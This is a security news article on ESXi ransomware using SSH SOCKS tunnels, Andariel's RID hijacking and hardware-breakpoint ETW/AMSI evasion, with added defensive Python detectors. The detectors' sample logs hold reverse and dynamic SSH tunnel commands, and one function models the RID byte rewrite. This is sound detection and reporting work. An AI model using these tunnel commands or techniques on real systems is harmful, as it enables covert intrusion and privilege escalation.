Ransomware Targets ESXi Systems via Stealthy SSH Tunnels for C2 Operations

Jan 28, 2025 | Ravie Lakshmanan | Ransomware / Threat Intelligence

Cybersecurity researchers have found that ransomware attacks targeting ESXi systems are also using that access to repurpose the appliances as a conduit for tunneling traffic to command-and-control (C2) infrastructure while staying under the radar.

"ESXi appliances, which are unmonitored, are increasingly exploited as a persistence mechanism and gateway to access corporate networks widely," Sygnia researchers Aaron (Zhongyuan) Hau and Ren Jie Yow said in a report published last week.

"Threat actors use these platforms by adopting 'living-off-the-land' techniques and using native tools like SSH to establish a SOCKS tunnel between their C2 servers and the compromised environment," the report said.

The goal is to blend in with legitimate traffic while maintaining long-term persistence on the compromised network, with little to no chance of being picked up by security monitoring.

The cybersecurity firm said that in many cases ESXi systems are compromised either by using administrator credentials or by exploiting a known security vulnerability to bypass authentication. The threat actors have subsequently been observed setting up a tunnel using SSH or other tools with equivalent functionality.

"Since ESXi appliances are resilient and rarely shut down unexpectedly, this tunneling serves as a semi-persistent backdoor within the network," the researchers noted.

Sygnia has also highlighted the difficulty of monitoring ESXi logs, stressing the need to configure log forwarding so that all relevant events are collected in one place for forensic investigations.

Organizations are advised to review the following four log files to detect SSH tunneling on ESXi appliances:

  • /var/log/shell.log (ESXi shell activity log)
  • /var/log/hostd.log (Host agent log)
  • /var/log/auth.log (Authentication log)
  • /var/log/vobd.log (VMware observer daemon log)
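The following is an added example, not code from the Sygnia report or from this article, of what reviewing those four files for SSH tunneling can look like in practice. It scans copies of shell.log, auth.log, hostd.log and vobd.log for three traces an SSH SOCKS tunnel leaves behind: an interactive `ssh` invocation carrying port-forwarding flags, successful SSH logins to the appliance, and the SSH or ESXi Shell service being switched on. The sample lines in `SAMPLE_LOGS` are constructed to resemble ESXi log formats and are not taken from any real incident; real entries differ in detail, so treat the regular expressions as a starting point.

```python
"""Added example, not code from the Sygnia report or from this article:
scan copies of the four ESXi log files named above for the traces an SSH
SOCKS tunnel leaves behind. The sample lines in SAMPLE_LOGS are
CONSTRUCTED to resemble ESXi log formats; real entries differ in detail."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample logs, keyed by the ESXi file name they imitate.
SAMPLE_LOGS: Dict[str, str] = {
    "shell.log": (
        "2025-01-20T09:58:12Z shell[70123]: [root]: esxcli network firewall ruleset list\n"
        "2025-01-20T10:01:44Z shell[70123]: [root]: ssh -fN -R 127.0.0.1:1080 ops@203.0.113.7\n"
        "2025-01-20T10:03:02Z shell[70123]: [root]: ls /vmfs/volumes\n"
        "2025-01-21T02:15:09Z shell[70201]: [root]: ssh -D 9050 -N backup@198.51.100.22\n"
    ),
    "auth.log": (
        "2025-01-20T09:57:55Z sshd[70100]: Accepted password for root from 192.0.2.40 port 51022 ssh2\n"
        "2025-01-20T09:57:55Z sshd[70100]: pam_unix(sshd:session): session opened for user root by (uid=0)\n"
        "2025-01-21T02:14:50Z sshd[70190]: Accepted publickey for root from 192.0.2.40 port 51988 ssh2\n"
    ),
    "hostd.log": (
        "2025-01-20T09:55:01Z hostd[2099] [Originator@6876 sub=Hostsvc] Datastore refresh complete\n"
        "2025-01-20T09:55:01Z hostd[2099] [Originator@6876 sub=Hostsvc.ServiceSystem] Service TSM-SSH started\n"
    ),
    "vobd.log": (
        "2025-01-20T09:55:01.511Z: [UserLevelCorrelator] 123456us: [esx.audit.ssh.enabled] SSH access has been enabled.\n"
        "2025-01-20T09:55:20.013Z: [UserLevelCorrelator] 123477us: [esx.audit.shell.enabled] ESXi Shell has been enabled.\n"
    ),
}


@dataclass
class Finding:
    source: str   # which log file the line came from
    kind: str     # ssh-tunnel-command | ssh-login | service-enabled
    detail: str   # extracted context (tunnel target, login source, ...)
    line: str     # the raw log line


# An interactive `ssh` invocation recorded in shell.log. Word-bounded so that
# "sshd" and "ssh2" do not match.
SSH_CMD = re.compile(r"(?<![A-Za-z])ssh(?![A-Za-z])\s+(?P<args>\S.*)$")
# Port-forwarding flags: -D (dynamic SOCKS), -R (reverse), -L (local), -w (tun),
# plus the -N/-f "no remote command, go to background" pair that tunnels rely
# on, or the long-form DynamicForward/RemoteForward/LocalForward options.
TUNNEL_FLAGS = re.compile(r"(?:^|\s)-[A-Za-z]*[DRLwNf]\b|(?:Dynamic|Remote|Local)Forward")
# Successful SSH logins in auth.log (who is using the appliance's SSH at all?).
SSH_LOGIN = re.compile(r"sshd\[\d+\]: Accepted (?P<method>[\w-]+) for (?P<user>\S+) from (?P<ip>\S+)")
# SSH or ESXi Shell service being enabled, as recorded in hostd.log / vobd.log.
SERVICE_ON = re.compile(r"esx\.audit\.(?:ssh|shell)\.enabled|TSM-SSH")


def scan_logs(logs: Dict[str, str]) -> List[Finding]:
    """Return every suspicious line across the four ESXi logs."""
    findings: List[Finding] = []
    for name, text in logs.items():
        for line in text.splitlines():
            if name == "shell.log":
                m = SSH_CMD.search(line)
                if m and TUNNEL_FLAGS.search(m.group("args")):
                    # The last token of an ssh command line is normally [user@]host.
                    target = m.group("args").split()[-1]
                    findings.append(Finding(name, "ssh-tunnel-command", target, line))
            elif name == "auth.log":
                m = SSH_LOGIN.search(line)
                if m:
                    who = f"{m['user']} from {m['ip']} ({m['method']})"
                    findings.append(Finding(name, "ssh-login", who, line))
            elif name in ("hostd.log", "vobd.log"):
                if SERVICE_ON.search(line):
                    findings.append(Finding(name, "service-enabled", "", line))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count findings per kind, e.g. {'ssh-tunnel-command': 2, ...}."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.kind] = counts.get(f.kind, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOGS):
        print(f"{f.source:10} {f.kind:20} {f.detail:40} {f.line}")
    print(summarize(scan_logs(SAMPLE_LOGS)))
```

On the constructed sample this flags the two `ssh` invocations carrying `-R`/`-D` flags (with their targets `ops@203.0.113.7` and `backup@198.51.100.22`), the two accepted SSH logins, and the three service-enable events. The practical caveat is the one the report makes: these files live on the appliance the attacker controls, so run the check against log copies that were forwarded off the host via syslog, not against the host's own `/var/log`, which can be truncated or rotated away before anyone looks.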

Andariel Employs RID Hijacking

The development comes as the AhnLab Security Intelligence Center (ASEC) revealed an attack carried out by the North Korea-linked Andariel group that uses a technique known as Relative Identifier (RID) hijacking to covertly modify the Windows Registry so that a guest or low-privileged account is granted administrative rights at its next login.

The tactic is stealthy because it exploits the fact that regular accounts are not subject to the same degree of monitoring as administrator accounts, allowing threat actors to carry out malicious activity while going unnoticed.

That said, RID hijacking requires that the adversary has already compromised a machine and obtained Administrator or SYSTEM privileges, because it involves changing the standard account's RID value to that of the built-in Administrator account (500).

In the attack chain documented by ASEC, the threat actor is said to have first obtained SYSTEM privileges using privilege escalation tools such as PsExec and JuicyPotato, then created a new account and granted it administrative privileges using this method.

"The threat actor then used the 'net localgroup' command to add the created account to the Remote Desktop Users group and the Administrators group," the company said. "When an account is added to the Remote Desktop Users group, the account can be accessed using RDP."

"After the RID value has been modified, the threat actor's account is identified as having the same privileges as the target account, enabling privilege escalation."
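To make the registry change described above concrete, here is an added example that is not from the ASEC report or this article. It models the per-account `F` value stored under `HKLM\SAM\SAM\Domains\Account\Users\<RID as 8 hex digits>`, where bytes 0x30..0x33 hold the account's RID as a little-endian DWORD; RID hijacking rewrites just those four bytes. The check compares the RID embedded in each `F` value with the RID the subkey is named after, which is exactly the inconsistency the technique creates. The `F` values here are constructed (only the RID field is populated); reading real ones from a live host requires SYSTEM privileges, for example by saving the hive with `reg save HKLM\SAM` and parsing it offline, and the subkey names and values would then be fed to `find_rid_hijacks` in the same shape.

```python
"""Added example, not from the ASEC report or this article: detect RID
hijacking by comparing the RID embedded in each SAM user's F value with the
RID the registry subkey is named after. The F values are CONSTRUCTED (only
the field this check reads is populated); real values carry more data."""
import struct
from typing import Dict, List, Tuple

# HKLM\SAM\SAM\Domains\Account\Users\<RID as 8 hex digits> holds one binary
# value "F" per account. Offset 0x30 of that F value is the account's RID as a
# little-endian DWORD; RID hijacking overwrites those four bytes with the RID
# of a privileged account so the next logon is treated as that account.
RID_OFFSET = 0x30
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 503: "DefaultAccount"}


def make_f_value(rid: int, size: int = 0x50) -> bytes:
    """Build a minimal, constructed F value with only the RID field filled in."""
    buf = bytearray(size)
    struct.pack_into("<I", buf, RID_OFFSET, rid)
    return bytes(buf)


def embedded_rid(f_value: bytes) -> int:
    """Read the RID the F value claims for the account."""
    if len(f_value) < RID_OFFSET + 4:
        raise ValueError("F value too short to contain a RID")
    return struct.unpack_from("<I", f_value, RID_OFFSET)[0]


def hijack_rid(f_value: bytes, new_rid: int) -> bytes:
    """What the attacker does: rewrite only bytes 0x30..0x33 of F.
    Everything else (timestamps, flags, hashes) is left untouched, which is
    why the change is easy to miss unless the RID is cross-checked."""
    buf = bytearray(f_value)
    struct.pack_into("<I", buf, RID_OFFSET, new_rid)
    return bytes(buf)


def find_rid_hijacks(users: Dict[str, bytes]) -> List[Tuple[str, int, int, str]]:
    """Return (subkey, key_rid, embedded_rid, impersonated_name) for every
    account whose F value claims a RID other than the one it was created with."""
    hits: List[Tuple[str, int, int, str]] = []
    for subkey, f_value in users.items():
        key_rid = int(subkey, 16)          # subkey name is the real RID in hex
        rid = embedded_rid(f_value)
        if rid != key_rid:
            hits.append((subkey, key_rid, rid, WELL_KNOWN_RIDS.get(rid, "unknown")))
    return hits


# Constructed SAM snapshot: the built-in Administrator (500) and Guest (501),
# one legitimate local user (1001) and one attacker-created account (1002)
# whose F value has been patched to carry RID 500.
SAMPLE_USERS: Dict[str, bytes] = {
    "000001F4": make_f_value(500),
    "000001F5": make_f_value(501),
    "000003E9": make_f_value(1001),
    "000003EA": hijack_rid(make_f_value(1002), 500),
}

if __name__ == "__main__":
    for subkey, key_rid, rid, name in find_rid_hijacks(SAMPLE_USERS):
        print(f"Users\\{subkey}: created as RID {key_rid} but F value says {rid} ({name})")
```

On the constructed snapshot the only hit is `000003EA`, the account created with RID 1002 whose `F` value now claims 500. A group-membership review alone would not catch this, since the hijacked account's RID makes it look like Administrator regardless of which groups it belongs to; the subkey-name versus embedded-RID comparison is the check that exposes it.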

New Technique for EDR Evasion

In related news, it has also emerged that an approach based on hardware breakpoints could be used to bypass Event Tracing for Windows (ETW) detections. ETW provides a mechanism to log events raised by user-mode applications and kernel-mode drivers.

This entails using a native Windows function, rather than SetThreadContext, to set the debug registers, thereby avoiding the ETW logging and events that EDRs parse to flag suspicious activity and getting around telemetry that relies on SetThreadContext.

"By using hardware breakpoints at the CPU level, attackers can hook functions and manipulate telemetry in userland without directly patching the kernel, challenging conventional defenses," Praetorian researcher Rad Kawar said.

"This is significant because it highlights a tactic that adversaries may employ to bypass AMSI scanning and maintain stealth while implementing 'patchless' hooks that bypass AMSI scanning and avoid ETW logging."
